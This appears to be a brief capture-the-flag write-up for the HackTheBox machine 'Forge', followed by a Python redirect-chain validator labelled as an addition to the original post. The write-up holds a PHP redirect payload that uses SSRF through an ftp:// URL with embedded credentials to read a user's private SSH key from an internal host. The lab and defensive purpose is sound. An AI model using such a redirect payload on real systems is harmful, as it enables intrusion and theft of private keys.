SSRF & Python Debugger - Forge @ HackTheBox

We are solving Forge, a medium-difficulty Linux machine on HackTheBox that involves an SSRF and some work with the Python debugger.

Notes

Indirect SSRF

<?php
// Answer the incoming request with a redirect to the admin.forge.htb upload endpoint.
header("Location: http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@forge.htb/.ssh/id_rsa");
?>
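A defensive counterpart, added here and not part of the original post: a check that re-validates every hop of a redirect chain, so a redirect response like the one above cannot steer a URL fetcher to an internal host. The DNS table, `files.example.net` and all function names are constructed for illustration, and it assumes the fetcher handles redirects itself.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name-to-address table standing in for DNS so the example runs offline.
SAMPLE_DNS = {
    "files.example.net": ["93.184.216.34"],  # constructed public address
    "admin.forge.htb": ["127.0.0.1"],        # assumption: vhost on the app server itself
}


def sample_resolve(host):
    """Hypothetical resolver: look the host up in SAMPLE_DNS."""
    return SAMPLE_DNS.get(host, [])


def hop_allowed(url, resolve=sample_resolve):
    """Return True only if this single hop is safe to fetch."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                      # rejects ftp://, file://, gopher://, ...
    if parts.username or parts.password:
        return False                      # no credentials embedded in the URL
    addrs = resolve(parts.hostname or "")
    if not addrs:
        return False                      # unresolvable or missing host
    # Every resolved address must be publicly routable (not loopback/private/link-local).
    return all(ipaddress.ip_address(a).is_global for a in addrs)


def first_blocked_hop(chain, resolve=sample_resolve):
    """Check the initial URL and each redirect target; return index of the first bad hop."""
    for index, url in enumerate(chain):
        if not hop_allowed(url, resolve):
            return index
    return None


if __name__ == "__main__":
    # Constructed chain: an external URL whose response redirects to the admin vhost.
    chain = [
        "http://files.example.net/redirect.php",
        "http://admin.forge.htb/upload?u=ftp://forge.htb/file",
    ]
    print(first_blocked_hop(chain))
```

In a real fetcher, disable automatic redirect following, run this check on each `Location` value, and connect to the address that was validated rather than resolving the name again.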
This post is licensed under CC BY 4.0 by the author.